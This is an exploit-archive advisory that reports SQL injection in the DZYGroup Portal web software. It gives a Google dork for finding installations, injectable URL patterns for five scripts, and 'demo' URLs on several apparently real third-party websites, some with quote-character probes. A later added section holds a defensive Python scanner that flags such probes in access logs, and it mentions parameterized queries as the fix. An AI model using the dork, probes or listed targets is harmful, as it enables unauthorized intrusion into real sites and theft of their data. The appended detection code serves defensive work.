################ Archive and Resource About Hacking ################
#
# Exploit Title: DZYGroup Portal SQL Injection Vulnerability
# Author: Netrondoank Aka netron
# Home Page: http://www.ilmuhacker.org
# Forum: http://www.indotek.or.id
# Vendor or Software Link: http://www.dzygroup.com/portfolio.php
# Version: N/A
# Category: webapps
# Google dork: "Powered by DZYGroup"
# Tested on: Linux Back Track 5
####################################################################
# Proof Of Concept [POC]

http://site/[path]/newsDetail.asp?idNews=[Sqli]
http://site/[path]/articledetail.php?id=[Sqli]
http://site/[path]/prodetail.asp?Lang=EN&ID_Product=[Sqli]
http://site/[path]/subcategory.asp?Lang=EN&ID_Category=22&ID_SubCategory=[Sqli]
http://site/[path]/newsdetail.php?id=[Sqli]

####################################################################
# Demo

http://www.kasintorn.com/en/newsDetail.asp?idNews=901
http://j-plan-motor.com/web/articledetail.php?id=%277
http://www.dzygroup.com/otherwebsite/sakaeo/EN/prodetail.asp?Lang=EN&ID_Product=%27224
http://www.starone-marketing.com/en/subcategory.asp?Lang=EN&ID_Category=22&ID_SubCategory=%2771
http://www.aubergine.in.th/en/newsdetail.php?id=27%27

####################################################################
# Greetz To: Allah swt, freedom for Palestine, Indonesiansecurity.info, 1337day.com, packetstormsecurity.org, Exploit-id.com, securityreason.com, securityfocus.com
####################################################################
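
For defenders reviewing the logs of a site running this portal, the following added example (not part of the original advisory) flags requests to the scripts listed in the PoC section whose ID parameter is not a plain integer. It assumes combined-format access logs and that these IDs are always numeric, as the advisory's sample values suggest; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script name (lower-cased) -> ID parameters the advisory lists as injectable.
AFFECTED = {
    "newsdetail.asp": ["idNews"],
    "newsdetail.php": ["id"],
    "articledetail.php": ["id"],
    "prodetail.asp": ["ID_Product"],
    "subcategory.asp": ["ID_SubCategory"],
}

# Request target in a common/combined access-log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return [(param, value)] where an affected ID parameter is not a plain integer."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    wanted = {p.lower() for p in AFFECTED.get(script, [])}
    hits = []
    # parse_qs percent-decodes values, so %27 is seen as a quote character.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() in wanted:
            hits += [(name, v) for v in values if not re.fullmatch(r"\d+", v)]
    return hits


def scan(lines):
    """Yield (line_number, param, value) for each flagged request in an access log."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            for name, value in suspicious_params(m.group(1)):
                yield n, name, value


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /en/newsDetail.asp?idNews=901 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /web/articledetail.php?id=%277 HTTP/1.1" 500 312',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /en/subcategory.asp?Lang=EN&ID_Category=22&ID_SubCategory=71%27 HTTP/1.1" 500 298',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /en/prodetail.asp?Lang=EN&ID_Product=224 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in the application before the value reaches the query (together with parameterized queries), removes the injection point rather than only detecting probes against it.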